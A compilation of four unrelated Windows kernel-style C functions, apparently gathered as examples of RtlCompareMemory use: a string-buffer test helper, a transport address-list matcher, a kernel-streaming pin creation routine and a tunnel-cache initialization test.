static BOOLEAN CheckStringBuffer( PCWSTR Buffer, SIZE_T Length, SIZE_T MaximumLength, PCWSTR Expected) { SIZE_T ExpectedLength = wcslen(Expected) * sizeof(WCHAR); SIZE_T EqualLength; BOOLEAN Result = TRUE; SIZE_T i; if (Length != ExpectedLength) { ok(0, "String length is %lu, expected %lu\n", (ULONG)Length, (ULONG)ExpectedLength); Result = FALSE; } EqualLength = RtlCompareMemory(Buffer, Expected, Length); if (EqualLength != Length) { ok(0, "String is '%S', expected '%S'\n", Buffer, Expected); Result = FALSE; } if (Buffer[Length / sizeof(WCHAR)] != UNICODE_NULL) { ok(0, "Not null terminated\n"); Result = FALSE; } /* the function nulls the rest of the buffer! */ for (i = Length + sizeof(UNICODE_NULL); i < MaximumLength; i++) { UCHAR Char = ((PUCHAR)Buffer)[i]; if (Char != 0) { ok(0, "Found 0x%x at offset %lu, expected 0x%x\n", Char, (ULONG)i, 0); /* don't count this as a failure unless the string was actually wrong */ //Result = FALSE; /* don't flood the log */ break; } } return Result; }
NTSTATUS LstransIsInAddressList( IN PTA_LSTRANS_ADDRESS AddrList, IN PTA_LSTRANS_ADDRESS Address, IN BOOLEAN InvalidateIfMatch ){ NTSTATUS status; ULONG idx_addr; // // Parameter check // if(!Address || Address->TAAddressCount != 1) { return STATUS_INVALID_PARAMETER; } if(!AddrList || AddrList->TAAddressCount < 1) { return STATUS_INVALID_PARAMETER; } // // Match address // status = STATUS_OBJECT_NAME_NOT_FOUND; for(idx_addr = 0; idx_addr < (ULONG)AddrList->TAAddressCount; idx_addr++) { if( Address->Address[0].AddressType == AddrList->Address[idx_addr].AddressType && Address->Address[0].AddressLength == AddrList->Address[idx_addr].AddressLength && RtlCompareMemory( &Address->Address[0].Address, &AddrList->Address[idx_addr].Address, Address->Address[0].AddressLength) == Address->Address[0].AddressLength) { if(InvalidateIfMatch) { AddrList->Address[idx_addr].AddressLength = 0; } status = STATUS_SUCCESS; break; } } return status; }
NTSTATUS NTAPI PinCreate( IN PKSPIN Pin, IN PIRP Irp) { PKSFILTER Filter; PKSPIN FirstPin; PPIN_CONTEXT PinContext; /* first get the parent filter */ Filter = KsPinGetParentFilter(Pin); /* now get first child pin */ FirstPin = KsFilterGetFirstChildPin(Filter, Pin->Id); /* sanity check */ ASSERT(FirstPin); if (FirstPin != Pin) { /* a previous pin already exists */ if (RtlCompareMemory(FirstPin->ConnectionFormat, Pin->ConnectionFormat, Pin->ConnectionFormat->FormatSize) != Pin->ConnectionFormat->FormatSize) { /* each instantiated pin must have the same connection format */ return STATUS_INVALID_PARAMETER; } } /* allocate pin context */ PinContext = ExAllocatePool(NonPagedPool, sizeof(PIN_CONTEXT)); if (!PinContext) return STATUS_INSUFFICIENT_RESOURCES; /* store pin context */ Pin->Context = PinContext; /* clear pin context */ RtlZeroMemory(PinContext, sizeof(PIN_CONTEXT)); /* FIXME * check allocator framing and apply to all pins */ return STATUS_SUCCESS; }
void TestFsRtlInitializeTunnelCache() { SIZE_T eq; T = ExAllocatePool(PagedPool, sizeof(TUNNEL)); ok(T != NULL, "PTUNEL is NULL after allocated memory\n"); Tb = ExAllocatePool(PagedPool, sizeof(TUNNEL)); ok(Tb != NULL, "PTUNEL is NULL after allocated memory\n"); memset((void*)T, 0, sizeof(TUNNEL)); memset((void*)Tb, 0, sizeof(TUNNEL)); FsRtlInitializeTunnelCache(T); eq = RtlCompareMemory((const VOID*)T, (const VOID*)Tb, sizeof(TUNNEL)); ok ( eq != sizeof(TUNNEL), "FsRtlInitializeTunnelCache function did not change anything in the memory at the address PTUNEL.\n"); }